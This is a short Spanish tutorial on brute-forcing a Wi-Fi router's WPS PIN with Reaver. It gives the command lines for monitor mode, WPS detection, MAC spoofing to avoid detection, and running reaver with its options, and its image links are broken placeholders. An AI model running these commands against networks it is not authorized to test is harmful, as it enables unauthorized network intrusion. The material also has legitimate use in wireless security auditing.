WPSReaver: Solucion y Problemas

Primer paso: Para evitar perder el tiempo es indispensable determinar si la red a auditar tiene activado WPS. 

*******************

 Antiguamente se podía hacer con Walsh pero este ya no es el caso. De todas formas indicamos las instrucciones por si alguien les puede sacar provecho

1) Desde la consola poner la tarjeta de red en modo monitor

#airmon-ng start wlan0

2) Ejecutar walsh

# walsh -i mon0 -C

*******************
Se propuso el siguiente metodo:

1) Desde la consola poner la tarjeta de red en modo monitor

#  airmon-ng start wlan0

2) Abrimos el wireshark. 

-> Menu Capture

->Options

Elegimos interfaz mon0 (o la que nos haya dado el airmon).

3) Nos aseguramos que no esté seleccionada ninguna opción, como se vé en la imagen

(http://)

4) Le damos a Start para comenzar la captura de paquetes. 

5) Para ver si tiene el WPS activado miramos en los paquetes broadcast la información que se encuentra en:

->IEEE 802.11 wireless LAN management frame

->Tagged parameters:

-> Tag: Vendor Specific: Microsoft WPS

Ejemplo:

(http://http:)

*******************

Si la red tiene WPS se puede proceder a utilizar Reaver

1) Dado que los ataques WPS son detectables, indispensable cambiar la MAC

# macchanger -m 00:11:22:33:44:55 mon0

2) Buscar el AP deseado y anotar su BSSID correspondiente

# airodump-ng mon0

3) Se ejecuta Reaver de esta manera

# reaver -i mon0 -b 00:11:22:33:44:56

Para ver detalles sobre el proceso añadir el switch -vv

#  reaver -i mon0 -b 00:11:22:33:44:56 -vv

Para cambiar el intervalo entre pins se usa el switch -d segundos. 0 Corresponde a desactivado.

#  reaver -i mon0 -b 00:11:22:33:44:56 -vv -d 1

*******************

Cabe anotar que aunque el Router tenga el boton fisico de WPS instalado, el modo no necesariamente esta habilitado internamente. Segun el manual Reaver no funciona con todos los Routers, y algunos pueden simplemente bloquearse ante el ataque.